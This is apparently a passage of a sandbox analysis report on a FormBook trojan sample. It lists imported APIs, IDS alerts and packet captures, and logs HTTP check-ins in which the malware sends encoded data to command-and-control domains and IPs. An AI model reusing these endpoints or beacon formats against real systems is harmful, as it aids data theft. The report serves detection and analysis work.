SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishGreat Britain

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  07/02/24-13:54:01.230234TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973580192.168.2.674.208.236.230
                  07/02/24-13:53:46.839272TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973080192.168.2.6142.202.6.230
                  07/02/24-13:53:54.891246TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973380192.168.2.6142.202.6.230
                  07/02/24-13:53:25.871349TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972780192.168.2.674.208.236.38
                  07/02/24-13:53:49.739854TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973180192.168.2.6142.202.6.230
                  07/02/24-13:54:03.924989TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973680192.168.2.674.208.236.230
                  07/02/24-13:53:46.839272TCP2856318ETPRO TROJAN FormBook CnC Checkin (POST) M44973080192.168.2.6142.202.6.230

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 2, 2024 13:53:25.777050018 CEST4972780192.168.2.674.208.236.38
                  Jul 2, 2024 13:53:25.781897068 CEST804972774.208.236.38192.168.2.6
                  Jul 2, 2024 13:53:25.782026052 CEST4972780192.168.2.674.208.236.38
                  Jul 2, 2024 13:53:25.871349096 CEST4972780192.168.2.674.208.236.38
                  Jul 2, 2024 13:53:25.876225948 CEST804972774.208.236.38192.168.2.6
                  Jul 2, 2024 13:53:26.306562901 CEST804972774.208.236.38192.168.2.6
                  Jul 2, 2024 13:53:26.307066917 CEST804972774.208.236.38192.168.2.6
                  Jul 2, 2024 13:53:26.307158947 CEST4972780192.168.2.674.208.236.38
                  Jul 2, 2024 13:53:26.320944071 CEST4972780192.168.2.674.208.236.38
                  Jul 2, 2024 13:53:26.326091051 CEST804972774.208.236.38192.168.2.6
                  Jul 2, 2024 13:53:46.813067913 CEST4973080192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:46.818201065 CEST8049730142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:46.818309069 CEST4973080192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:46.839272022 CEST4973080192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:46.844032049 CEST8049730142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:48.071429968 CEST8049730142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:48.071558952 CEST8049730142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:48.071608067 CEST4973080192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:48.344857931 CEST4973080192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:49.379843950 CEST4973180192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:49.717567921 CEST8049731142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:49.721026897 CEST4973180192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:49.739854097 CEST4973180192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:49.744673967 CEST8049731142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:51.251710892 CEST4973180192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:51.589421034 CEST8049731142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:51.589438915 CEST8049731142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:51.589519978 CEST4973180192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:51.589544058 CEST4973180192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:51.589545965 CEST8049731142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:51.589590073 CEST4973180192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:51.590509892 CEST8049731142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:51.590563059 CEST4973180192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:51.594402075 CEST8049731142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:51.594460011 CEST4973180192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:52.292047977 CEST4973280192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:52.296983957 CEST8049732142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:52.297063112 CEST4973280192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:52.318998098 CEST4973280192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:52.323766947 CEST8049732142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:52.323997974 CEST8049732142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:53.554630041 CEST8049732142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:53.554723978 CEST8049732142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:53.554786921 CEST4973280192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:53.829077005 CEST4973280192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:54.865434885 CEST4973380192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:54.871121883 CEST8049733142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:54.871335030 CEST4973380192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:54.891246080 CEST4973380192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:54.896044016 CEST8049733142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:56.117063046 CEST8049733142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:56.117083073 CEST8049733142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:56.117094040 CEST8049733142.202.6.230192.168.2.6
                  Jul 2, 2024 13:53:56.117239952 CEST4973380192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:56.117275953 CEST4973380192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:56.125910044 CEST4973380192.168.2.6142.202.6.230
                  Jul 2, 2024 13:53:56.130664110 CEST8049733142.202.6.230192.168.2.6
                  Jul 2, 2024 13:54:01.197640896 CEST4973580192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:01.204140902 CEST804973574.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:01.204231977 CEST4973580192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:01.230233908 CEST4973580192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:01.235073090 CEST804973574.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:01.751252890 CEST804973574.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:01.751272917 CEST804973574.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:01.751373053 CEST4973580192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:02.735456944 CEST4973580192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:03.771397114 CEST4973680192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:03.891377926 CEST804973674.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:03.891573906 CEST4973680192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:03.924988985 CEST4973680192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:03.929771900 CEST804973674.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:04.429312944 CEST804973674.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:04.429393053 CEST804973674.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:04.429594040 CEST4973680192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:05.438705921 CEST4973680192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:06.882581949 CEST4973780192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:06.887476921 CEST804973774.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:06.887553930 CEST4973780192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:06.911597967 CEST4973780192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:06.916413069 CEST804973774.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:06.916513920 CEST804973774.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:07.978430986 CEST804973774.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:07.978528023 CEST804973774.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:07.978537083 CEST804973774.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:07.978718042 CEST4973780192.168.2.674.208.236.230
                  Jul 2, 2024 13:54:07.979111910 CEST804973774.208.236.230192.168.2.6
                  Jul 2, 2024 13:54:07.979222059 CEST4973780192.168.2.674.208.236.230

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 2, 2024 13:53:25.608663082 CEST6216153192.168.2.61.1.1.1
                  Jul 2, 2024 13:53:25.655145884 CEST53621611.1.1.1192.168.2.6
                  Jul 2, 2024 13:53:46.401879072 CEST6184253192.168.2.61.1.1.1
                  Jul 2, 2024 13:53:46.803977966 CEST53618421.1.1.1192.168.2.6
                  Jul 2, 2024 13:54:01.165091038 CEST6553053192.168.2.61.1.1.1
                  Jul 2, 2024 13:54:01.188201904 CEST53655301.1.1.1192.168.2.6

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 2, 2024 13:53:25.608663082 CEST192.168.2.61.1.1.10x76f0Standard query (0)www.costmoon.comA (IP address)IN (0x0001)false
                  Jul 2, 2024 13:53:46.401879072 CEST192.168.2.61.1.1.10xe2fStandard query (0)www.6171nvuhb.rentA (IP address)IN (0x0001)false
                  Jul 2, 2024 13:54:01.165091038 CEST192.168.2.61.1.1.10x536dStandard query (0)www.motorsportgives.comA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 2, 2024 13:53:25.655145884 CEST1.1.1.1192.168.2.60x76f0No error (0)www.costmoon.com74.208.236.38A (IP address)IN (0x0001)false
                  Jul 2, 2024 13:53:46.803977966 CEST1.1.1.1192.168.2.60xe2fNo error (0)www.6171nvuhb.rent142.202.6.230A (IP address)IN (0x0001)false
                  Jul 2, 2024 13:54:01.188201904 CEST1.1.1.1192.168.2.60x536dNo error (0)www.motorsportgives.com74.208.236.230A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • www.costmoon.com
                  • www.6171nvuhb.rent
                  • www.motorsportgives.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.64972774.208.236.38805700C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 13:53:25.871349096 CEST541OUTGET /9m56/?Stux7=wSNNrhltoDErcnEw+GwIxBUk+E+vX1/TDY+0HSDY/xjQqFM+lgiwoO4LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPNkNvcw4gdSknrLieRXJ4XwgsEWF+LJyDECQspbYqq9pNrRLiTEI=&YF9Df=_VBD7fO8YfupmT HTTP/1.1
                  Host: www.costmoon.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Jul 2, 2024 13:53:26.306562901 CEST770INHTTP/1.1 404 Not Found
                  Content-Type: text/html
                  Content-Length: 626
                  Connection: close
                  Date: Tue, 02 Jul 2024 11:53:26 GMT
                  Server: Apache
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.649730142.202.6.230805700C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 13:53:46.839272022 CEST799OUTPOST /hqcp/ HTTP/1.1
                  Host: www.6171nvuhb.rent
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.6171nvuhb.rent
                  Referer: http://www.6171nvuhb.rent/hqcp/
                  Content-Length: 210
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: max-age=0
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Data Raw: 53 74 75 78 37 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 53 33 4c 58 75 4e 6a 30 32 38 72 30 69 38 76 63 2f 42 30 2f 79 43 66 34 47 66 46 73 45 4b 75 31 79 79 61 67 34 34 53 56 67 46 2b 62 32 41 2f 70 59 79 6b 4f 77 66 4c 77 61 70 4b 4c 36 37 76 6c 72 62 44 72 58 6b 62 6b 45 78 37 41 32 61 56 41 66 6d 4e 62 6d 45 6b 37 52 78 31 38 34 74 68 6e 2b 79 2b 5a 6b 42 50 6d 4d 6d 57 6b 4b 6f 72 6b 45 73 66 42 2b 49 76 74 51 6b 74 6c 79 50 4f 4c 32 7a 55 39 52 74 44 30 38 56 42 6f 68 5a 69 41 70 62 4c 76 45 52 31 36 58 70 4b 66 54 70 31 49 57 36 50 54 6c 33 71 69 65 4c 6f 55 34 31 55 4e 49 37 69 6b 50 77 49 42 4e 77 62 64 57 41 69 4d
                  Data Ascii: Stux7=X5xwEotSV/RSS3LXuNj028r0i8vc/B0/yCf4GfFsEKu1yyag44SVgF+b2A/pYykOwfLwapKL67vlrbDrXkbkEx7A2aVAfmNbmEk7Rx184thn+y+ZkBPmMmWkKorkEsfB+IvtQktlyPOL2zU9RtD08VBohZiApbLvER16XpKfTp1IW6PTl3qieLoU41UNI7ikPwIBNwbdWAiM
                  Jul 2, 2024 13:53:48.071429968 CEST744INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Tue, 02 Jul 2024 11:53:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Data Raw: 32 30 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 54 5f 6f da 40 0c 7f e7 53 dc ee 09 24 72 c9 e5 7f 0a 74 02 06 52 3b 44 35 95 f6 85 22 74 b9 5c 9a 00 49 68 ee 58 59 5b be fb 9c 85 6d 68 dd 33 6a 24 c7 67 9f ed 9f e3 d8 ee 4a 5e a6 5b 85 78 c2 4a 29 54 0f df cd c6 9a 8f 51 1a f5 f0 a4 bf 1c de 4c 26 a3 e1 0c 23 59 f2 1e d6 75 19 ad 89 43 c9 86 e9 2b a9 81 a0 6d cb 82 64 69 4e 56 12 5f 76 f5 3a d8 65 a3 7b 3c 4c fa 24 cd 53 d5 7c 4d a3 0b 6c 5d 0d e4 fd 6d 69 ee 6f fa c3 ab fb eb 3b dc e6 eb ff 68 0f ad f7 71 1a df 59 89 96 49 a6 50 af 66 6f 6f 68 be e8 34 9a f1 2e e7 2a 2d f2 66 0b bd 36 10 aa cc 92 0c 8c a2 82 ef 32 91 2b c2 4b c1 94 18 6d 44 25 35 71 9d 17 6e 75 c0 38 c9 08 7c 15 18 e3 44 a9 ad bc d0 75 d0 84 2c 8d 76 84 17 59 25 ac e4 67 df 30 38 8f 4d cf e6 16 73 02 8b 59 ae 63 09 97 f1 30 0e e1 c6 e3 b8 8a 54 c1 ca 53 d4 47 a1 8e 90 72 f0 63 c6 1e a7 2c 13 7f c1 e7 c6 a2 83 c0 4d 92 2d 2b 21 ad 69 11 09 a8 93 14 a5 1a 88 b8 28 45 33 c9 da 48 42 92 87 56 13 de 1f a9 1e 9e e7 f8 d4 0b a0 0e 81 ed [TRUNCATED]
                  Data Ascii: 20fT_o@S$rtR;D5"t\IhXY[mh3j$gJ^[xJ)TQL&#YuC+mdiNV_v:e{<L$S|Ml]mio;hqYIPfooh4.*-f62+KmD%5qnu8|Du,vY%g08MsYc0TSGrc,M-+!i(E3HBVETDcQ3QMphL.i?VL{-k6xgm]9Cya/iMxS"6]9~C1D<8F*&p;@fi&wT=yT<+,E}CuCC*R0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.649731142.202.6.230805700C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 13:53:49.739854097 CEST823OUTPOST /hqcp/ HTTP/1.1
                  Host: www.6171nvuhb.rent
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.6171nvuhb.rent
                  Referer: http://www.6171nvuhb.rent/hqcp/
                  Content-Length: 234
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: max-age=0
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Data Raw: 53 74 75 78 37 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 55 6e 37 58 74 71 50 30 6d 73 72 31 74 63 76 63 74 42 30 37 79 43 54 34 47 66 74 61 44 38 47 31 79 51 43 67 71 70 53 56 68 46 2b 62 2b 67 2f 73 63 79 6b 48 77 66 57 44 61 74 43 4c 36 2f 48 6c 72 66 48 72 58 58 6a 6a 43 68 37 43 74 4b 56 43 42 57 4e 62 6d 45 6b 37 52 31 56 61 34 72 4a 6e 35 42 6d 5a 6d 67 50 6e 47 47 57 6e 63 59 72 6b 41 73 66 46 2b 49 75 49 51 67 4e 50 79 4e 6d 4c 32 32 6f 39 41 63 44 7a 31 56 41 68 76 35 6a 58 34 36 33 6d 49 69 56 6e 65 6f 53 75 54 49 4a 4a 54 4d 4f 4a 35 45 71 42 4d 62 49 57 34 33 4d 2f 49 62 69 4f 4e 77 77 42 66 6e 58 36 5a 30 48 76 73 56 65 65 77 56 41 70 4a 44 4e 62 4c 4a 42 2f 4d 4d 65 69 32 77 3d 3d
                  Data Ascii: Stux7=X5xwEotSV/RSUn7XtqP0msr1tcvctB07yCT4GftaD8G1yQCgqpSVhF+b+g/scykHwfWDatCL6/HlrfHrXXjjCh7CtKVCBWNbmEk7R1Va4rJn5BmZmgPnGGWncYrkAsfF+IuIQgNPyNmL22o9AcDz1VAhv5jX463mIiVneoSuTIJJTMOJ5EqBMbIW43M/IbiONwwBfnX6Z0HvsVeewVApJDNbLJB/MMei2w==
                  Jul 2, 2024 13:53:51.589421034 CEST744INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Tue, 02 Jul 2024 11:53:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Data Raw: 32 30 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 54 5f 6f da 40 0c 7f e7 53 dc ee 09 24 72 c9 e5 7f 0a 74 02 06 52 3b 44 35 95 f6 85 22 74 b9 5c 9a 00 49 68 ee 58 59 5b be fb 9c 85 6d 68 dd 33 6a 24 c7 67 9f ed 9f e3 d8 ee 4a 5e a6 5b 85 78 c2 4a 29 54 0f df cd c6 9a 8f 51 1a f5 f0 a4 bf 1c de 4c 26 a3 e1 0c 23 59 f2 1e d6 75 19 ad 89 43 c9 86 e9 2b a9 81 a0 6d cb 82 64 69 4e 56 12 5f 76 f5 3a d8 65 a3 7b 3c 4c fa 24 cd 53 d5 7c 4d a3 0b 6c 5d 0d e4 fd 6d 69 ee 6f fa c3 ab fb eb 3b dc e6 eb ff 68 0f ad f7 71 1a df 59 89 96 49 a6 50 af 66 6f 6f 68 be e8 34 9a f1 2e e7 2a 2d f2 66 0b bd 36 10 aa cc 92 0c 8c a2 82 ef 32 91 2b c2 4b c1 94 18 6d 44 25 35 71 9d 17 6e 75 c0 38 c9 08 7c 15 18 e3 44 a9 ad bc d0 75 d0 84 2c 8d 76 84 17 59 25 ac e4 67 df 30 38 8f 4d cf e6 16 73 02 8b 59 ae 63 09 97 f1 30 0e e1 c6 e3 b8 8a 54 c1 ca 53 d4 47 a1 8e 90 72 f0 63 c6 1e a7 2c 13 7f c1 e7 c6 a2 83 c0 4d 92 2d 2b 21 ad 69 11 09 a8 93 14 a5 1a 88 b8 28 45 33 c9 da 48 42 92 87 56 13 de 1f a9 1e 9e e7 f8 d4 0b a0 0e 81 ed [TRUNCATED]
                  Data Ascii: 20fT_o@S$rtR;D5"t\IhXY[mh3j$gJ^[xJ)TQL&#YuC+mdiNV_v:e{<L$S|Ml]mio;hqYIPfooh4.*-f62+KmD%5qnu8|Du,vY%g08MsYc0TSGrc,M-+!i(E3HBVETDcQ3QMphL.i?VL{-k6xgm]9Cya/iMxS"6]9~C1D<8F*&p;@fi&wT=yT<+,E}CuCC*R0
                  Jul 2, 2024 13:53:51.590509892 CEST744INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Tue, 02 Jul 2024 11:53:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Data Raw: 32 30 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 54 5f 6f da 40 0c 7f e7 53 dc ee 09 24 72 c9 e5 7f 0a 74 02 06 52 3b 44 35 95 f6 85 22 74 b9 5c 9a 00 49 68 ee 58 59 5b be fb 9c 85 6d 68 dd 33 6a 24 c7 67 9f ed 9f e3 d8 ee 4a 5e a6 5b 85 78 c2 4a 29 54 0f df cd c6 9a 8f 51 1a f5 f0 a4 bf 1c de 4c 26 a3 e1 0c 23 59 f2 1e d6 75 19 ad 89 43 c9 86 e9 2b a9 81 a0 6d cb 82 64 69 4e 56 12 5f 76 f5 3a d8 65 a3 7b 3c 4c fa 24 cd 53 d5 7c 4d a3 0b 6c 5d 0d e4 fd 6d 69 ee 6f fa c3 ab fb eb 3b dc e6 eb ff 68 0f ad f7 71 1a df 59 89 96 49 a6 50 af 66 6f 6f 68 be e8 34 9a f1 2e e7 2a 2d f2 66 0b bd 36 10 aa cc 92 0c 8c a2 82 ef 32 91 2b c2 4b c1 94 18 6d 44 25 35 71 9d 17 6e 75 c0 38 c9 08 7c 15 18 e3 44 a9 ad bc d0 75 d0 84 2c 8d 76 84 17 59 25 ac e4 67 df 30 38 8f 4d cf e6 16 73 02 8b 59 ae 63 09 97 f1 30 0e e1 c6 e3 b8 8a 54 c1 ca 53 d4 47 a1 8e 90 72 f0 63 c6 1e a7 2c 13 7f c1 e7 c6 a2 83 c0 4d 92 2d 2b 21 ad 69 11 09 a8 93 14 a5 1a 88 b8 28 45 33 c9 da 48 42 92 87 56 13 de 1f a9 1e 9e e7 f8 d4 